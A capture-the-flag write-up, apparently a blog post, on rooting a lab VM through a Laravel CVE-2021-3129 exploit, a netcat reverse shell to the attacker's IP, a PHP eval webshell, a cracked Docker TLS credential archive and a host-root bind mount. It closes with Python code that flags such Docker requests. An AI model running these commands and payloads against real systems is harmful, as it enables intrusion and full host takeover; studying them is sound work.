
Reproducing a group member's target machine: lara

lara

nmap -p- 192.168.10.13                           
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:21 EST
Nmap scan report for lara (192.168.10.13)
Host is up (0.00085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:33:87:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Port 80 looks empty; port 8000 is a Laravel app, so the idea is apparently to use an existing PoC. It felt like CVE-2021-3129, but several PoCs I tried did not work.

joshuavanderpoll/CVE-2021-3129: Laravel RCE Exploit Script - CVE-2021-3129 (user-friendly with automatic log detection) is the one that works.

Get a reverse shell directly.

python3 poc.py --host http://192.168.10.13:8000/ --exec "busybox nc 192.168.10.11 6666 -e /bin/sh" --no-cache --force --chain laravel/rce12

I could not seem to upgrade to a stable shell. A look at the root directory turned up .dockerenv, so this is a Docker environment. I did not know where to start, having never studied Docker escapes. Then I found that it is possible to write files under /var/www/html, which is the port 80 webroot, so I dropped a webshell there.

echo '<?php @eval($_POST["cmd"]);?>' > z.php
cat z.php
<?php @eval($_POST["cmd"]);?>

Connecting with AntSword gives uid=65534(nobody) gid=65534(nobody) groups=65534(nobody).

Under the alice user I noticed the command openssl enc -aes-256-cbc -in certs.tar.gz -out tar.gz.enc -iter 10000 -pbkdf2, plus a .enc file.

AntSword could not download it, so I ran xxd -p on the .enc file and converted it back from hex on my side.

I had an AI write a brute-force script to decrypt it; the password 060606 yields the certs, which are Docker API credentials. Use socat to forward the daemon's TLS port out:
./socat TCP-LISTEN:1234,fork,bind=0.0.0.0 TCP:127.0.0.1:2376

docker --tls \
    --tlscacert=ca.pem \
    --tlscert=client-cert.pem \
    --tlskey=client-key.pem \
    -H=tcp://192.168.10.13:1234 \
    version
Client:
 Version:           27.5.1+dfsg4
 API version:       1.47
 Go version:        go1.24.9
 Git commit:        cab968b3
 Built:             Thu Nov  6 10:43:49 2025
 OS/Arch:           linux/amd64
 Context:           default

Server:
 Engine:
  Version:          28.3.3
  API version:      1.51 (minimum version 1.24)
  Go version:       go1.24.11
  Git commit:       bea959c7b793b32a893820b97c4eadc7c87fabb0
  Built:            Tue Dec  2 23:05:51 2025
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          v2.1.5
  GitCommit:        fcd43222d6b07379a4be9786bda52438f0dd16a1
 runc:
  Version:          1.3.4
  GitCommit:        d842d7719497cc3b774fd71620278ac9e17710e0
 docker-init:
  Version:          0.19.0
  GitCommit:        

Privilege escalation

docker --tls \
    --tlscacert=ca.pem \
    --tlscert=client-cert.pem \
    --tlskey=client-key.pem \
    -H=tcp://192.168.10.13:1234 \
    images 
REPOSITORY     TAG       IMAGE ID       CREATED       SIZE
laravel-vuln   latest    aaf7bbe495b7   3 weeks ago   141MB
# just reuse the existing image
docker --tls \
    --tlscacert=ca.pem \
    --tlscert=client-cert.pem \
    --tlskey=client-key.pem \
    -H=tcp://192.168.10.13:1234 \
    run -v /:/mnt --rm -it laravel-vuln chroot /mnt /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cat /root/root.txt
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}

Privilege escalation complete.
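The root step works only because the daemon accepts a bind mount of the host root from any client holding the leaked certs. The following added example (not the post's code, not Docker's) shows the check a daemon-side authorization plugin or a log reviewer would apply to the HostConfig of a container-create request; the request body is a constructed approximation of what the `docker run -v /:/mnt ... chroot /mnt /bin/sh` command above sends, and the field names are the Engine API's own.

```python
import json
import posixpath

# Host paths whose exposure inside a container amounts to host root access.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/proc", "/sys", "/dev", "/var/run/docker.sock")


def _is_sensitive(source: str) -> bool:
    # Collapse "//", trailing slashes and ".." before comparing.
    src = posixpath.normpath("/" + source.lstrip("/"))
    return src == "/" or any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_host_config(host_config: dict) -> list:
    """Return human-readable findings for settings that hand over the host."""
    findings = []
    for bind in host_config.get("Binds") or []:
        # Binds are "source:target[:options]"; a source without a leading "/" is a named volume.
        source, _, rest = bind.partition(":")
        target = rest.split(":", 1)[0]
        if source.startswith("/") and _is_sensitive(source):
            findings.append(f"bind mount of host path {source} at {target}")
    for mount in host_config.get("Mounts") or []:
        src = mount.get("Source") or ""
        if mount.get("Type") == "bind" and src.startswith("/") and _is_sensitive(src):
            findings.append(f"bind mount of host path {src} at {mount.get('Target')}")
    if host_config.get("Privileged"):
        findings.append("privileged container")
    if host_config.get("PidMode") == "host":
        findings.append("pid namespace shared with host")
    risky_caps = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH"}
    for cap in host_config.get("CapAdd") or []:
        if cap.upper().removeprefix("CAP_") in risky_caps:
            findings.append(f"added capability {cap}")
    return findings


def audit_create_request(body: dict) -> list:
    return audit_host_config(body.get("HostConfig") or {})


# Constructed: roughly what the writeup's docker run command POSTs to /containers/create.
CONSTRUCTED_CREATE_BODY = json.loads("""{
  "Image": "laravel-vuln",
  "Cmd": ["chroot", "/mnt", "/bin/sh"],
  "HostConfig": {"Binds": ["/:/mnt"], "AutoRemove": true, "Privileged": false}
}""")

if __name__ == "__main__":
    for finding in audit_create_request(CONSTRUCTED_CREATE_BODY):
        print("DENY:", finding)
```

A non-empty result is the signal to deny the request or raise an alert; the same check over daemon audit logs would have flagged this escalation the moment the container was created.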

posted @ 2026-01-19 22:05  场-room